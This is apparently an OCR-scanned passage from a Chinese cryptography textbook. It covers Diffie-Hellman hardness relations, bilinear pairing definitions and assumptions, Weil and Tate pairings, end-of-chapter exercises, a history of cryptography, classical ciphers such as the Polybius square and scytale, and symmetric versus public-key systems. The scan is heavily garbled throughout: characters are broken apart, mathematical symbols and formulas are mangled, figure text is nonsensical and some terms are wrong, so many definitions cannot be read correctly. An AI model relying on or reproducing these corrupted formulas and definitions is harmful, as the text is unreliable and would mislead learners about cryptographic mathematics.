上 述 三 个 问题 通常 被 视 为 困难 性 问题 ,但 是 它们 的 困难 “程度 ”不同 。 显 然 , 如 果 能 够 计 
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算 ECDL 问题 ,那么 就 能 够 解决 CDH 和 DCDH 问题 。 如 果 能 够 解决 CDH 问题 ,就 能 够 解 
决 DCDH 问题 和 DDH 问题 。 如 果 能 解决 DCDH 问题 ,就 能 够 解决 CDH 问题 和 DDH 问 
题 。 所 以 说 DDH 问题 不 比 CDH 问题 困难 ,CDH 不 比 ECDL 问题 更 难 ,DCDH 问题 和 
CDH 问题 一 样 困难 。 它 们 之 间 的 关系 可 以 表示 如 下 : 

ECDL -~ CDH 之 DCDH -> DDH 


其 中 A 一 B 表示 问题 A 至 少 和 问题 也 一 样 困 难 。 

4. 双 线 性 对 基本 定义 及 性 质 

双 线 性 对 所 具有 的 计算 特性 使 它 成 为 构造 许多 密码 算法 ,特别 是 基于 身份 的 密码 算法 
的 重要 数学 工具 。 下 面 将 从 性 质 、 数 学 定义 及 实现 性 能 等 方面 对 双 线 性 对 进行 介绍 。 

。 G1: g 阶 加 法 循环 群 ,g 为 素数 。 

。 G,: g 阶 加 法 循环 群 ,9 为 素数 。 

。 Gr: g 阶乘 法 循环 群 ,q 为 素数 。 
9: 从 G 到 Gs 的 同 态 (homomorphism)。 
P: G 的 生成 元 。 

。 P:: Gs 中 一 个 g 阶 元 素 ,p(P,)==Pi。 

。Z,: 模 p 加 法 群 (10,1,2,…,p 一 1),Z ;表示 模 p 乘法 群 {1,2,…,p 一 1) ,p 为 素数 。 

双 线 性 对 的 定义 如 下 。 

定义 2.49 ”如 果 一 个 二 元 函数 e: G1 XG,Gr 满足 下 述 性 质 ，: 

。 双 线 性 : 对 任意 的 (P,Q)EGiXG, 及 任意 (a,6)EZ,XZ,,e(aP,bQ)=e (P,Q)*。 

。 非 退化 性 : 存在 非 平凡 的 g 阶 点 PEG, 和 QEG;i 满足 e(P,Q) 关 1。 

。 可 计算 性 : 对 任意 的 (P,Q) EGiXG, ,存在 算法 可 以 有 效 地 计算 e(P, Q)。 

则 称 该 二 元 函数 e 为 双 线 性 对 (Bilinear Pairing) 。 

g 阶 群 G1、Gs 及 Gr, 点 Pi、P,, 双 线性 对 e, 有 时 还 包括 同 态 p, 这 些 参数 共同 构成 了 双 
线性 对 的 参数 集 。 元 素 的 下 标 通常 表示 该 元 素 属 于 具有 相应 下 标的 群 。 

有 关 双 线性 困难 问题 及 其 假设 如 下 。 
双 线 性 Diffie-Hellman(BDH) 问 题 ; 给 定 四 元 组 (P,aP,bP,cP)( 其 中 ,随机 元 素 
| 于 | 计算 eCP;P)**。 
判定 双 线 性 Diffie-Hellman(DBDH) 问 题 : 给 定 五 元 组 (P,aP,bP,cP,e (P,P)") 
(其 中 ,随机 元 素 c,b,c,dERkZ，; ) ,判断 等 式 e (P,P) 一 ce (P,P)“% 是 否 成 立 。 
Gap 双 线 性 Diffie-Hellman(GBDH) 问 题 ; 给 定 四 元 组 (P,aP,bP,cP)( 其 中 ,随机 
元 素 a,b,cERZs; ), 在 DBDH(。*) 预 言 机 的 辅助 下 计算 e (P,P)*。 

定义 2.50 ” (BDH 假设 ): 称 群 (G1 ,Gr,e,P) 满 足 BDH 假设 ,如 果 对 于 足够 大 的 安全 
参数 ,任意 概率 多 项 式 时 间 算 法 A. 满 足 : 

Pr[A(G, ,Gr,P,aP ,bP ,cP) = e (P,P)®*] < elk) 

其 中 ,a,b,cEZs ,el(k) 是 可 忽略 的 。 

与 CDH 问题 类 似 ,BDH 问题 也 是 计算 性 问题 。 另 外 一 方面 ,对 BDH 问题 的 求解 能 归结 为 
对 CDH 问题 的 求解 。 也 就 是 说 ,如 果 我 们 能 解决 CDH 问题 ,那么 我 们 也 能 解决 BDH 问题 。 

定义 2.51 (DBDH 假设 ): 称 群 (G,Gr,e,P) 满 足 DBDH 假设 ,如 果 对 于 足够 大 的 安 


全 参数 ,任意 概率 多 项 式 时 间 算 法 A, 满 足 : 
| PrLA(G ,Gr ,PsaP ,bP ,cP ,el(P,P)®) = 1]— 
Pr[A(Gi,Gr,P,aP .bP ,cP,e(P,P)’")=1]|<e(k) 

其 中 ,a,b,c,dEZs ,el(k) 是 可 忽略 的 。 

定义 2.52 (GBDH 假设 ): 称 群 (G,Gr,e,P) 满 足 GBDH 假设 ,如 果 对 于 足够 大 的 安 
全 参数 ,任意 概率 多 项 式 时 间 算 法 A, 满 足 : 

Pr[LAPPR" (G, ,Gr , P,aP ,bP ,cP) = e (P,P)*] < el(k) 

其 中 ,a,5b,cEZs ,e(k) 是 可 忽略 的 ,并 且 算 法 A 可 以 调用 DBDH(。 ) 预 言 机 。 

非 形式 化 地 讲 ,GBDH 假设 指 的 是 ,在 敌手 可 以 查询 DBDH 预言 机 的 情况 下 ,BDH 假 
设 仍然 是 成 立 的 。 

5.，Weil 对 和 Tate 对 

在 实际 应 用 中 ,可 以 通过 Weil 对 和 Tate 对 导出 满足 定义 2. 49 的 双 线 性 对 。 

令 BE/P, 是 一 条 椭圆 曲线 ,E[g] 是 E/F, 上 所 有 9- 挠 点 形成 的 %- 挠 群 ,其 中 9 是 一 个 满 
足 如 下 条 件 的 素数 : g| #E(F,) 并 且 char(F,)1g。 定 义 几 一 v{zE 开 lz 一 1) 表 示 由 下 中 4 
次 单位 根 组 成 的 群 。 令 a 表示 满足 g1p" 一 1 的 最 小 正 整数 , 则 被 称 作曲 线 下/F, 关于 g 的 
安全 系数 ,或 敌人 度 (embedding degree) ,pw 夺 Fi。E(Fyp)[gj] 是 一 个 g- 挠 群 , 且 同 构 于 
ZXZ,。 定 义 gE(Fy) 二 {gqP|PEE(Fy)} 则 商 群 E(Fy )/gE(Fy ) 也 是 一 个 q- 挠 群 , 且 同 
构 于 Z ,XZ ,。 

定义 2.53 若 映 射 满足 : 

er:E(Fy)[g] XE(Fy)[g] — po 

则 称 此 映射 为 Weil 对 。 

Weil 对 满足 如 下 属性 。 
双 线 性 : 对 任意 的 P,Q,R,SEE(Fy)[gj,es (PR,Q)==e,(P,Q)，e,(R,Q) 及 
es(P,Q 十 S) 二 es(P,Q)，es(R,S) 成 立 。 
非 退 化 性 : 车 对 于 任意 PEE(Fy)[gj, 总 有 e,(P,Q) 二 1, 则 Q==O; 同样 地 ,车 对 于 
任意 QEE(Fy)[gj] 总 有 e,(P,Q)==1, 则 P=0。 
对 于 任意 PEE(Fy)[qj, 总 有 es(P,P)=1。 
对 于 任意 P,QEE(Fy)[gj, 总 有 es(P,Q)=e, (Q,P) 1!。 
定义 2.54 假设 E(Fy )[qj 中 存在 阶 为 gq 的 点 , 则 Tate 对 是 如 下 的 映射 : 

,EFy)Lq] X EC(Fy)/gqE (Fy) —> Fi/ (Fj) 
修正 的 Tate 对 是 如 下 的 映射 : 
tu:E(Fy)Lgq] X EC(Fy)/gE (Fy)—> pu 


Tate 对 和 修正 的 Tate 对 之 间 的 关系 是 : mn(P,Q)= 一 P,Q> 写 . 
修正 的 Tate 对 满足 如 下 属性 。 
。 双 线性 : 对 任意 的 P,REE(Fy)[g] 及 Q,SEE(Fyp)/g€E(Fyp),t (P+R,Q)= 
tA(P,Q) :ty(R,Q@) 及 Tt(P,Q 十 S)==t(P,Q)， zt,(P,S) 成 立 。 
。 非 退化 性 : 对 于 任意 P 关 OE E(Fy )[gj, 存 在 QEE(Fy )/gE(Fy ) 满 足 (P,Q) 产 1。 


需 久 潞 
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Weil 对 和 Tate 对 都 是 多 项 式 时 间 可 计算 的 ,由 于 在 实际 中 Tate 对 具有 更 广泛 的 参数 
选择 范围 ,因此 Tate 对 相对 于 Weil 对 更 加 高 效 。 在 某 些 环境 中 ,其 他 双 线 性 对 ,如 Eta 对 
和 Ate 对 具有 比 Tate 对 更 高 的 执行 效率 。 


2.7 小 结 


本 章 介 绍 了 有 关 密 码 学 的 数学 知识 ,包括 数论 .抽象 代数 .离散 概率 、 信 息 论 和 复杂 性 理 
论 ,最 后 给 出 常用 的 计算 困难 问题 及 其 假设 。 


1. 判断 题 ,给 出 正确 与 否 ,并 说 明理 由 。 

如 果 P 二 NP, 那 么 下 面 说 法 正确 么 ? 

(1) 一 次 一 密 密 码 本 (One-Time Pad) 仍 旧 提 供 信息 论 安全 (Information-Theoretically 
Secure) 的 消息 认证 。 

(2) 安全 加 密 将 是 不 能 实现 的 。 

(3) shamir 秘密 分 享 (Secret-Sharing) 技 术 将 变 得 不 安全 。 

(4) 单 向 函数 (One-Way Function) 不 存在 。 

2. 区 别 问 题 实例 与 算法 。 

3. 求 963 和 657 的 最 大 公约 数 (963, 657), 并 表示 成 963,657 的 线性 组 合 。 

4. 关于 椭圆 曲线 ,回答 下 列 问 题 : 

(1) Weierstrass 方程 定义 的 椭圆 曲线 是 一 条 非 奇 异 曲 线 的 充分 必要 条 件 是 什么 ? 

(2) 如 何 理解 定义 在 K 上 的 两 条 椭圆 曲线 同 构 ? 

(3) 什么 是 椭圆 曲线 的 自 同 态 ? 
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秩序 ,在 某 种 意义 上 就 是 要 让 参与 社会 活动 的 一 切实 体能 够 按照 既定 的 规则 行事 ， 

如 果 违 反 规 则 就 需要 受到 惩罚 。 信 息 安 全 的 秩序 就 是 关于 身份 \, 权 限 、 行 为 的 约定 和 执 
行 。 在 当前 的 技术 体系 中 ,密码 学 是 实现 身份 .权限 和 行为 安全 的 最 佳 理论 和 实践 。 

一 一 田 景 成 


3.1 一 些 有 趣 的 解 谜 实例 


1. 永远 的 矢 车 菊 任 务 是 从 游戏 中 的 解 谜 谈 起 

在 游戏 (大 航海 时 代 Online) 中 , “永远 的 和 撩 车 菊 任 务 ” 难 倒 无 数 玩家 ,两 位 堪 称 史上 最 
牛 的 玩家 冰 魂 心 .水 镜 却 利用 密码 学 知识 找到 了 一 丝 晶 光 ! 破译 优势 信息 : 

(1) 在 城 里 领 了 26 个 物品 后 ,提示 卡 纳 冯 伯 琐 在 金字 塔 附近 ,但 是 ,无 论 换 什么 衣服 和 
他 说 话 ,都 没有 实质 性 反应 。 

(2) 永远 的 矢 车 菊 任 务 连锁 到 : 寻找 大 盗墓 集团 ,和 海事 公会 会 长 对 话 3 次 ,分 别 给 出 
提示 :“4445332443”、“434512454212”、“42452433”。 

这 些 信 息 涉及 密码 学 破译 隐藏 暗示 。 

(1) 暗示 一 : 数字 替代 法 是 密码 学 中 常用 的 方法 , 先 分 拆 这 个 数列 ,找到 数字 替代 的 
字母 。 

(2) 暗示 二 : 如 何 分 拆 数字 ; 第 一 行 10 个 数字 ,第 二 行 12 个 数字 ,第 三 行 8 个 数字 ,3 
数字 分 拆 不 完整 ; 采用 2 数字 分 拆 : 44 45 33 24 43,43 45 12 45 42 12,42 45 24 33。 

(3) 暗示 三 : 所 有 数字 都 是 由 1 一 5 以 内 的 数字 组 成 一 一 暗合 棋盘 密码 。 

棋盘 密码 是 由 公元 前 2 世纪 ,伟大 的 希腊 历史 学 家 、 军 事 家 数学 家 波 利 比 奥 斯 发 明 , 又 
称 为 波 利 比 奥 斯 方 表 (Polybius Square) ,如 表 3. 1 所 示 。 只 要 将 密 文采 用 2 数字 分 拆 , 再 将 
每 组 两 个 数字 对 应 查 表 ( 第 一 个 数字 对 应 行 , 第 二 个 数字 对 应 列 ) , 即 可 得 出 明文 。 因 此 明文 
为 : tuni(j)s 一 一 tunis 突尼斯 ,suburb 一 一 郊外 ,rui(j)n 一 一 ruin 废墟 。 


表 3.1 波 利 比 奥 斯 方 表 


1 2 3 4 5 
下 a b 3 d e 
2 闻 g h i/j k 
3 7 m n o p 
4 gq r s t u 
5 v 也 工 y zx 
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2. scytale 密码 

历史 上 最 早 的 有 记录 的 密码 应 用 大 约 是 在 公元 前 5 世纪 , 古 希 腊 的 斯 巴 达 人 使 用 一 种 
叫做 scytale 的 棍子 来 传递 加 密 信 息 。 在 scytale 上 ,斯 巴 达 人 会 以 螺旋 形 缠绕 一 条 羊皮 纸 
或 皮革 。 发 信人 在 缠绕 的 羊皮 纸 上 横 着 写 下 相关 的 信息 ,然后 将 羊皮 纸 取 下 ,这样 羊皮 纸 上 
就 是 一 些 毫 无 意义 的 字母 顺序 。 如 果 要 将 这 条 消息 解码 , 收 件 人 只 要 将 羊皮 纸 再 次 缠绕 在 
相同 直径 的 棍棒 上 ,这 样 就 可 以 读 出 信件 的 内 容 , 如 图 3. 1 所 示 。 


图 3.1 scytale 密码 


有 一 个 故事 是 这 样 的 : 公元 前 404 年 ,斯 巴 达 的 Lysander 遇 到 了 一 个 从 波斯 回来 的 信 
使 ,他 们 一 行 5 人 中 只 有 这 一 个 人 从 这 趟 艰险 的 旅程 中 回来 了 。 这 个 信使 解 下 他 的 皮带 ， 
Lysander 将 皮带 卷 在 scytale 上 , 读 出 了 信和 的 内 容 , 知 道 了 波斯 将 要 进攻 他 的 意图 ,因而 提 
前 做 好 了 准备 。 

从 上 述 实 例 可 以 看 出 , 解 谜 通常 是 与 密码 学 紧密 相连 的 ,其 背后 必然 有 规则 可 寻 , 从 而 
如 何 构造 这 样 的 “规则 ”如 何 利用 “规则 ”以 及 如 何 评价 “规则 ?将 是 密码 学 的 主要 目标 。 本 
章 将 以 "密码 历史 回顾 一 密码 学 基本 概念 一 古典 密码 实例 ”3 方面 内 容 展开 。 


3.2 密码 演化 : 从 艺术 到 完美 


密码 学 的 起 源 可 以 追溯 到 远古 时 代 。 密 码 学 多 次 在 战争 中 发 挥 了 至 关 重 要 的 作用 ,第 
二 次 世界 大 战 中 的 中 途 岛 海战 便 是 著名 实例 之 一 。 由 于 密码 学 的 特殊 作用 ,世界 各 国 对 密 
码 学 的 研究 一 直 秘 密 进 行 ,密码 学 方面 的 文献 非常 少 。 第 二 次 世界 大 战 之 后 ,一 些 著名 密码 
学 著作 的 发 表 揭 开 了 密码 学 的 神秘 面纱 。 

现代 社会 ,人 们 对 信息 的 依赖 越 来 越 严重 ,信息 的 安全 传输 与 存储 变 得 越 来 越 重 要 , 密 
码 学 是 保障 信息 安全 的 有 效 手段 。 如 今 ,密码 学 的 应 用 已 经 渗透 到 包括 军事 、 政 治 \、 经 济 等 
社会 生活 的 各 个 方面 。 密 码 学 是 安全 协议 中 的 核心 技术 ,是 构造 安全 协议 的 基本 工具 ,是 研 
究 密 码 编码 原理 和 破译 密码 方法 的 一 门 科学 。 密 码 学 可 以 构建 整个 信息 社会 的 基础 设施 ， 
包括 为 每 个 实体 提供 安全 的 身份 .权限 表达 ; 保护 交易 、 通 讯 和 信息 的 私密 性 、 完 整 性 、 抗 抵 
赖 性 ; 为 事后 追溯 .责任 认定 提供 安全 的 技术 手段 。 目 前 ,已 经 在 一 些 应 用 中 取得 了 很 好 的 
成 果 , 如 网 上 报税 、 网 上 工商 .网 上 报关 、 电 子 病历 、 网 上 银行 .网 上 证 券 等。 密码 学 也 为 我 国 
的 电子 签名 法 提供 了 强 有 力 的 技术 保障 和 支撑 。 随 着 信息 化 的 发 展 ,会 有 更 多 的 领域 和 应 
用 需要 密码 学 技术 ,同时 也 会 对 密码 技术 提出 更 高 的 要 求 , 提 供 更 好 的 密码 算法 、 协 议和 技 
术 实 现 。 新 型 密码 学 层出不穷 : 代理 重 密码 学 (Proxy Re-Cryptography) 因 信任 域 转化 或 解 
密 能 力 传递 而 产生 .属性 密码 学 (Attribute Based Cryptography) 因 需要 对 密 文 实现 访问 控 


制 而 产生 ,批量 密码 学 (Batch Cryptography) 因 需要 解决 多 消息 解密 或 多 密 钥 协商 的 效率 
问题 而 产生 , 非 交 换 密码 学 (Non-Commutative Cryptography) 因 应 对 量子 计算 或 生物 计算 
对 公 钥 密码 的 攻击 而 产生 等 。 

密码 学 的 发 展 历史 基本 上 可 以 分 为 4 个 阶段 : 艺术 密码 、 古 典 密码 、 计 算 密 码 与 物理 密 
码 。 艺 术 密 码 是 密码 学 的 原始 表现 形式 ,这 种 形式 的 密码 主要 通过 一 些 技巧 将 信息 隐藏 在 
语言 文字 、 符 号、 图 片 等 公开 的 代码 中 。 从 某 种 意义 上 来 说 ,这 种 密码 形式 更 多 的 是 作为 一 
种 游戏 和 欣赏 。 而 不 是 作为 实用 的 信息 保护 体制 。 艺 术 密 码 可 以 通过 多 种 方式 来 实现 , 主 
要 方式 包括 : 文字 变形 .在 艺术 作品 中 加 入 巧妙 的 手笔 .符号 的 适当 排列 等 。 在 现代 社会 
中 ,艺术 密码 仍 是 人 们 感 兴趣 的 密码 形式 , 常 在 艺术 作品 和 文字 游戏 中 出 现 。 

经 过 上 千年 的 演化 与 发 展 , 由 于 政治 .军事 和 外 交 等 领域 的 需要 ,安全 性 成 为 密码 的 关 
键 因素 ,原始 的 艺术 密码 不 能 保证 这 种 安全 ,于 是 古典 密码 形式 诞生 了 。 其 历史 可 以 追溯 到 
公元 前 一 世纪 ,Caesar 大 帝 就 曾 在 战争 中 使 用 过 一 种 极 简单 的 代 换 式 密码 : 每 个 字母 都 由 
其 后 的 第 三 个 字母 ( 依 字 母 表 顺 序 ) 所 代 换 ,这 就 是 所 谓 的 Caesar 密码 系统 的 难 形 。 古 典 密 
码 学 的 发 展 主要 出 现 了 两 种 密码 体制 : 置换 密码 体制 和 代 换 密码 体制 。 置 换 密码 体制 的 特 
点 是 明文 和 密 文中 所 含 的 元 素 式 相同 的 ,仅仅 是 位 置 不 同 而 已 ; 代 换 密码 体制 中 , 密 文 和 明 
文 不 是 直接 的 置换 关系 ,而 是 通过 一 个 或 多 个 明文 字母 表 到 密 文字 母 表 的 映射 将 明文 加 密 
成 密 文 ,可 以 分 为 单 表 代 换 密码 体制 和 多 表 代 换 密码 体制 。 因 此 ,古典 密码 本 质 上 是 一 种 以 
线性 代数 为 基础 的 密码 形式 。 虽 然 许多 古典 密码 已 经 不 能 抵抗 现代 手段 的 攻击 ,但 是 它们 
对 于 现代 密码 学 的 研究 是 功 不 可 没 的 ,其 思想 至 今 仍然 被 广泛 使 用 。 但 是 在 很 长 的 时 间 内 ， 
密码 仅 限于 军事 ,政治 和 外 交 的 用 途 ,密码 学 的 知识 和 经 验 也 仅 掌 握 在 与 军事 .政治 和 外 交 
有 关 的 密码 机 关 之 中 ,再 加 上 通信 手段 比较 落后 ,所 以 ,不 论 是 密码 理论 还 是 密码 技术 ,发 展 
都 很 缓慢 。 

1949 年 ,信息 论 的 创始 人 Shannon 提出 了 保密 通信 系统 模型 。 他 将 当时 的 各 种 加 密 体 
制 概括 成 一 对 加 密 和 解密 变换 器 ,把 保密 通信 系统 概括 为 一 条 传输 密 钥 的 秘密 信道 和 通过 
密 钥 进行 的 加 、 解 密 变 换 , 以 及 传输 这 种 变换 结构 的 普通 信道 。 他 的 这 一 工作 为 其 后 的 保密 
通信 系统 开辟 了 一 条 用 数学 模型 法 和 现代 信息 论 进行 定量 分 析 的 密码 学 之 路 。 计 算 机 技术 
的 快速 发 展 ,使 我 们 进入 了 信息 化 社会 ,信息 的 传输 、 处 理 等 过 程 逐 渐 转 移 到 计算 机 中 ,信息 
的 加 密 、 解 密 也 从 人 工 、 机 械 方式 转 由 计算 机 方式 来 处 理 。 通 过 计算 机 来 处 理 信息 变 换 就 有 
无 可 比拟 的 优势 ,其 中 最 重要 的 就 是 能 够 实现 加 、 解 密 的 自动 化 ,这 对 于 大 容量 高 速率 的 保 
密 性 数据 通信 尤其 显得 重要 。 由 此 产生 了 可 在 计算 机 和 计算 机 芯片 上 运行 的 计算 密码 形 
式 。 对 称 密 钥 体制 是 计算 密码 中 的 一 种 重要 的 密码 体制 ,这 种 密码 体制 的 基本 思想 是 加 密 
密 钥 和 解密 密 钥 相同 或 者 对 称 。 因 此 ,这 种 密码 体制 要 求 所 有 密 钥 都 被 严格 保密 ,不 得 有 任 
何 泄露 。 非 对 称 密码 体制 是 计算 密码 中 的 另 一 种 重要 的 密码 体制 ,基本 思想 是 加 密 密 钥 和 
解密 密 钥 不 对 称 。 也 就 是 说 ,由 一 个 密 钥 可 以 很 容易 的 导出 另 一 个 密 钥 ,但 是 送 过 程 很 难 实 
现 。 因 此 , 非 对 称 密 钥 体制 本 质 上 就 是 一 个 单 向 函数 。 需 要 指出 的 是 ,计算 密码 中 使 用 的 单 
向 函数 都 是 基于 计算 复杂 度 的 ,对 应 的 安全 性 属于 计算 安全 。 由 于 非 对 称 密码 体制 中 ,部 分 
密 钥 可 以 像 电 话 号 码 一 样 公开 ,因此 非 对 称 密码 也 称 为 公 钥 密码 体制 。 除 此 以 外 ,网 络 和 通 
信 技 术 的 飞速 发 展 导致 了 对 身份 认证 数字 签名 和 消息 确认 等 方面 的 强烈 需求 ,计算 密码 特 
别 是 公 钥 密码 在 这 些 方面 具有 良好 的 优势 。 
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虽然 计算 密码 取得 了 很 大 的 成 功 ,并 将 继续 在 信息 安全 方面 发 挥 重要 作用 ,但 也 存在 一 
些 问 题 。 首 先 ,计算 密码 不 能 提供 具有 无 条 件 安全 性 的 密码 方案 。 现 代 密 码 学 认为 ,任何 加 
密 体系 的 加 密 解密 算法 都 是 可 以 公开 的 ,其 安全 性 在 于 密 钥 的 保密 性 。 实 际 上 ,由 于 存在 被 
动 窃听 的 可 能 性 ,如 果 通 信 双 方 完全 通过 在 经 典 信道 上 传输 经 典 信息 , 则 在 双方 之 间 建 立 保 
密 的 密 钥 是 不 可 能 的 。 其 次 , 随 着 技术 的 不 断 发 展 , 量 子 计 算 机 的 出 现 威胁 着 计算 密码 的 安 
全 性 。 研 究 表明 ,用 量子 计算 机 破译 RSA 算法 只 要 几 分 钟 量 级 的 时 间 。 为 了 解决 这 些 问 
题 并 促进 密码 学 的 发 展 ,人 们 提出 了 基于 物理 学 的 密码 体制 。 所 谓 物理 密码 是 指 以 承载 信 
息 的 载体 即 各 种 物理 信号 和 相应 的 物理 系统 的 内 计 物 理 属性 对 信息 进行 密码 处 理 。 显 然 这 
种 方式 和 计算 密码 完全 不 同 。 现 在 已 经 提出 的 物理 密码 包括 量子 密码 、 混 沌 密码 和 光学 密 
码 3 种。 其 中 ,应 用 前 景 最 明朗 的 是 量子 密码 。 

密码 学 发 展 历史 简 图 如 图 3. 2 所 示 。 
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图 3.2 密码 学 发 展 历史 简 图 


3.3 ”密码 学 基本 概念 


1. 密码 学 的 研究 内 容 

密码 学 以 研究 秘密 通信 为 目的 , 即 研究 对 传输 信息 采取 何 种 秘密 的 变换 以 防止 第 三 方 
对 信息 的 窃取 。 它 是 密码 编码 学 和 密码 分 析 学 的 统称 。 其 中 ,密码 编码 学 研究 密码 体制 的 
设计 ,对 信息 进行 编码 以 实现 隐蔽 信息 ,从 事 密 码 编码 学 研究 的 人 员 称 为 密码 编码 者 ; 而 密 
码 分 析 学 是 研究 如 何 破 解 被 加 密 信 息 从 而 获取 有 效 信息 的 方法 和 理论 ,在 未 知 密 钥 的 情况 
下 推演 出 明文 和 密 钥 的 技术 ,从 事 密码 分 析 学 研究 的 人 员 称 为 密码 分 析 者 。 密 码 编码 学 和 
密码 分 析 学 是 相互 对 立 、 相 互 依存 并 不 断 发 展 的 。 

2. 密码 系统 的 体制 

定义 : (密码 体制 ) 它 是 一 个 五 元 组 IM、C、K、E、D), 如 图 3.3 所 示 。 

(1) M 是 可 能 明文 的 有 限 集 ( 明 文 空间 ) 。 

(2) C 是 可 能 密 文 的 有 限 集 ( 密 文 空间 ) 。 

(3) K 是 一 切 可 能 密 钥 构成 的 有 限 集 ( 密 钥 空 间 ) 。 

(4) 无 是 加 密 算 法 。 

(5) D 是 解密 算法 。 

对 于 任意 EK ,有 一 个 加 密 算法 e: EE 和 相应 的 解密 算法 di ED, 使 得 e;: MC 和 


di: C>M 分 别 为 加 密 解 密 函 数 ,满足 di (ei (zx)) 二 zx, 这 里 EM。 
搭 线 信道 。 搭 线 信道 
二 人 主动 攻击 ) ( 收 动 攻击 ) [车 订 二 于 me 


Ce 
密 
于 :| 本 he 


(> 
ee. 和 


3.3 密码 体制 


若 按 照 密 钥 数 量 不 同 ,可 以 分 为 对 称 体制 (又 称 为 单 钥 体 制 、 私 钥 体 制 . 专 有 密 钥 体 制 ) 
与 非 对 称 体制 (又 称 为 双 钥 体制 . 公 钥 体制 )。 

(1) 对 称 体制 : 加 密 密 钥 和 解密 密 钥 是 相同 的 。 为 了 安全 性 , 密 钥 要 定期 的 改变 。 对 
称 密 钥 加 密 算 法 速度 快 ,所 以 在 处 理 大 量 数 据 的 时 候 被 广泛 使 用 ,其 关键 是 保证 密 钥 的 安 
全 ,如 图 3.4 所 示 。 


| 加 密 解密 


明文 m _| 加 密 变换 | 密 文 C 解密 变换 | _ 明文 m 
发 送 者 4 | C=BxzD | 信息 传送 信道 |Lz=DKC)| 接收 者 B 
加 密 器 解密 器 


图 3.4 对 称 密码 体制 模型 


(2) 非 对 称 体制 : 加 密 和 解密 使 用 不 同 的 密 钥 的 密码 技术 。 它 使 用 一 对 密 钥 ,一 个 归 
发 送 者 ,一 个 归 接 收 者 。 密 钥 对 中 的 一 个 是 公开 密 钥 ( 可 以 让 所 有 通信 的 人 知道 ) ,简称 公 钥 
(public key) ,用 于 加 密 ; 另 一 个 必须 保持 秘密 状态 ,是 私人 密 钥 (一 个 专门 为 自己 使 用 的 密 
钥 ) ,用 于 解密 ,简称 私 钥 (private key) 。 公 钥 和 私 钥 通过 一 种 非常 重要 的 原理 在 数学 上 互 
相关 联 , 但 不 能 由 一 个 推出 另 一 个 。 数 据 发 送 方 用 接收 方 的 公 钥 加 密 数据 ,只 有 接收 方 的 私 
钥 才 能 解密 该 加 密 后 的 数据 。 用 公式 表示 如 下 : 

加 密 过 程 为 


En(M)=C 
解密 过 程 为 
Duez(C) 一 M 
其 中 , 和 心 分 别 为 加 密 密 钥 和 解密 密 钥 ,如 图 3. 5 所 示 。 
非 对 称 密码 体制 中 的 私 钥 与 对 称 密码 体制 中 的 密 钥 有 本 质 的 不 同 : 对 称 密码 体制 中 的 
密 钥 通常 是 一 个 符号 串 ( 如 比特 ) ,而 非 对 称 密码 体制 中 的 私 钥 是 一 个 数字 或 数字 集合 。 即 
密 钥 和 私 钥 是 不 可 交换 的 ,因为 秘密 的 类 型 不 同 。 
公 钥 密码 体制 采用 数学 中 的 难 解 问题 来 构造 算法 。 现 有 的 公 钥 密码 系统 主要 基于 3 类 
问题 : 一 类 是 因子 分 解 问题 ,如 RSA 公 钥 密码 ; 另 一 类 是 离散 对 数 问题 ,如 ElGamal 公 钥 


十 典 移 码 


贡 w 溃 


秦 于 案例 的 网 络 安全 技术 与 实践 


公开 密 钥 6 私有 窗 钥 名 

| 加 密 
明文 m _[ 而 密 变换 明文 m 
发 送 者 4 [CBa(m) 接收 者 有 


加 密 器 
图 3.5 公 钥 密码 体制 模型 


密码 .D-H 密 钥 交换 ; 第 三 类 是 ECDLP( 椭 圆 曲 线 离散 对 数 问题 ) 。 

(3) 混合 密码 体制 : 将 对 称 体制 和 非 对 称 体制 结合 ,利用 各 自 的 优势 形成 的 密码 体制 ， 
也 是 实际 应 用 中 采用 的 密码 体制 。 

首先 总 结对 称 密码 和 非 对 称 密码 的 优势 与 劣势 : 

从 速度 上 来 说 , 非 对 称 密码 比 对 称 密码 慢 。 由 于 传统 的 对 称 密码 使 用 的 基本 手段 是 代 
换 和 和 置换 ,其 在 计算 机 内 实现 起 来 速度 很 快 。 而 非 对 称 密码 基于 某 些 数学 上 的 难题 ,计算 复 
杂 ,速度 慢 。 一 般 来 讲 , 对 称 加 密 比 使 用 数论 操作 的 公 钥 加 密 快 近 千 倍 。 

非 对 称 密码 算法 对 选择 明文 攻击 是 敏感 的 ,而 对 称 密码 不 存在 这 种 问题 。 比 如 对 于 
C 二 Ei (M) , 当 M 仅仅 是 有 限 个 可 能 的 明文 集合 中 的 一 个 时 ,破译 者 仅仅 需要 尝试 有 限 的 
次 数 ,就 可 以 得 到 明文 M。 虽然 不 能 据 此 得 到 私有 密 钥 , 但 是 对 于 大 多 数 情况 下 明文 M 被 
泄露 ,这 也 是 不 被 允许 的 。 

从 所 需要 的 密 钥 数量 角度 来 说 ,具有 郊 个 通信 节点 的 网 络 要 实现 相互 之 间 的 保密 通信 ， 
如 果 采 用 对 称 加 密 需 要 n(n 一 1)/2 个 密 钥 ,而 非 对 称 加 密 只 需要 2n 个 ,相差 一 个 数量 级 。 
这 样 对 于 大 型 的 网 络 而 言 , 非 对 称 加 密 在 密 钥 管理 上 具有 优势 。 

从 密 钥 的 分 发 角度 来 说 ,对 称 加 密 需 要 一 个 安全 的 信道 以 传递 密 钥 ,在 有 些 情 况 下 ,这 
样 的 安全 信道 是 不 存在 的 ,而 非 对 称 加 密 不 需要 在 信道 上 传递 密 钥 。 但 准确 地 讲 , 非 对 称 加 
密 是 不 需要 在 信道 上 传递 私有 密 钥 ,传递 公开 密 钥 还 是 必须 的 ,这 样 怎 么 保证 公开 密 钥 的 完 
整 性 又 是 一 个 问题 。 

从 密码 体制 的 功能 角度 来 说 ,对 称 密码 算法 难以 实现 数字 签名 。 因 为 通信 的 双方 拥有 
相同 的 密 钥 ,一 段 消息 被 加 密 以 后 ,无 法 向 第 三 方 证 明 这 个 加 密 的 消息 到 底 来 自 于 哪 一 方 ， 
因为 参与 通信 的 双方 都 可 以 完成 此 工作 。 而 在 非 对 称 加 密 中 ,因为 只 有 本 人 才 知 道 自 己 的 
私 钥 , 所 以 不 存在 这 样 的 问题 。 

总 之 ,对 称 密码 体制 与 非 对 称 密码 体制 的 特点 主要 是 由 以 下 两 点 本 质 不 同 产生 的 : 

(1) 对 称 密码 体制 是 基于 共享 秘密 的 , 公 钥 密码 体制 是 基于 个 人 秘密 的 。 

(2) 在 对 称 密码 体制 中 ,符号 被 重新 排序 或 蔡 换 ; 在 公 钥 密码 体制 中 ,处 理 的 对 象 是 数 
